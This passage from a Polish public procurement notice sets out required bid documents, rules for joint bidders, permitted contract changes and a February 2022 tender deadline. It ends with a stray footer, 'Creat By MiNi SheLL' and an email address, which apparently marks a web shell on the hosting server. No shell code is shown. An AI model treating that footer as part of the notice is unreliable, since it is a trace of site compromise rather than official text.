z wykonawców. <br/><br/>b)	wykazu usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane - zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ, wraz z dowodami określającymi czy usługi, o których mowa powyżej zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/><br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, wykaz usług składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA MUSI ZAWIERAĆ: <br/>a)	formularz ofertowy - wg załącznika nr 1 do SWZ, <br/><br/>2.	WRAZ Z OFERTĄ WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ: <br/>a)	oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp, traktujące o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu aktualne na dzień składania ofert w zakresie wskazanym w załączniku nr 2 do SWZ,<br/>	Oświadczenie stanowi wstępne potwierdzenie braku podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert, <br/>	Oświadczenie składają odrębnie:<br/>- Wykonawca,<br/>- podmiot udostępniający zasoby, w zakresie w jakim go dotyczy (jeżeli dotyczy)<br/>- każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>(jeżeli dotyczy);<br/>b)	stosowne pełnomocnictwa (jeżeli dotyczy), <br/>	przypadku składania oferty wspólnej - pełnomocnictwo podmiotów występujących wspólnie, <br/>	pełnomocnictwo do podpisania oferty, względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z dokumentów potwierdzających uprawnienie do występowania w obrocie prawnym,<br/>c)	zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy wraz <br/>z oświadczeniem o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału <br/>w postępowaniu – wzór stanowi załącznik nr 3 do SWZ,<br/>Ww. oświadczenie należy złożyć tylko wtedy, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby.<br/>d)	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia wskazujące, które dostawy wykonają poszczególni Wykonawcy (jeżeli dotyczy), według wzoru - załącznik nr 4 do SWZ <br/>Ww. dokument należy złożyć w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia. <br/>W takim przypadku: <br/>	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;<br/>	Dokument pełnomocnictwa może zostać załączony do oferty w:<br/>a)	oryginale w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem osobistym lub popisem zaufanym osoby/osób upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie <br/>z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej, lub<br/>b)	elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem zaufanym osoby posiadającej uprawnienia notariusza;<br/>	Pełnomocnictwo musi być załączone do oferty i zawierać w szczególności wskazanie: <br/>a)	postępowania o zamówienie publiczne, którego dotyczą, <br/>b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>c)	ustanowionego pełnomocnika oraz zakresu jego umocowania;<br/>	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie <br/>z pełnomocnikiem;<br/>	Informacje dotyczące składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia podmiotowych środków dowodowych w ramach przedmiotowego zamówienia zostały określone w Części VIII SWZ. <br/>	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia brak podstaw wykluczenia musi wykazać każdy z Wykonawców oddzielnie, wobec powyższego wszystkie oświadczenia i dokumenty w zakresie braku podstaw wykluczenia wymagane <br/>w postępowaniu składa odrębnie każdy z Wykonawców wspólnie występujących. <br/>	Przed zawarciem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych Wykonawców, zawierającą co najmniej:<br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2)	określenie zakresu działania poszczególnych stron umowy;<br/>	Czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający, na podstawie art. 455 ust. 1 pkt 1) ustawy Pzp, dopuszcza możliwość zmian<br/>postanowień Umowy w stosunku do treści złożonej oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, tj:<br/>a) wynagrodzenia, w przypadku zmiany urzędowej stawki podatku od towarów i usług VAT,<br/>b) zmianę umowy w zakresie jej zmniejszenia do 50% wartości określonej w §5 ust.1 niniejszej<br/>umowy,<br/>c) Zamawiający dopuszcza zmianę w zakresie cen brutto wskazanych w umowie w przypadku<br/>ustawowej zmiany podatku VAT<br/>a) zmiana zakresu lub sposobu realizacji Przedmiotu Umowy<br/>w przypadku:<br/>- gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa, mających wpływ na<br/>realizację Przedmiotu Umowy,<br/>- zajścia okoliczności, na które Strony nie miały wpływu, w tym tzw. „siły wyższej”, a<br/>skutkujących – bezpośrednio lub pośrednio – znacznym utrudnieniem lub uniemożliwieniem<br/>spełnienia świadczeń Stron w sposób określony przy podpisaniu umowy, o ile wyżej wymienione<br/>okoliczności mają charakter obiektywny,<br/>- zaistnienia okoliczności niezależnych od Zamawiającego<br/>i Wykonawcy, których nie można było wcześniej przewidzieć przy zachowaniu należytej<br/>staranności, a które mają wpływ na Przedmiot Umowy;<br/>Przez siłę wyższą rozumie się zdarzenie, którego przyczyny leżą poza kontrolą danej Strony, są<br/>nagłe i zewnętrzne, w tym między innymi takie przyczyny jak: wojna, embargo, akty normatywne<br/>lub decyzje administracji państwowej, zdarzenia losowe, powódź, pożar, strajki, epidemie lub<br/>pandemie chorób. Wystąpienie siły wyższej rozpatrywane będzie tak w skali kraju, jak w skali<br/>poszczególnych jednostek administracyjnych kraju, na których wystąpiły opisane wyżej zjawiska. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-18 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-18 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com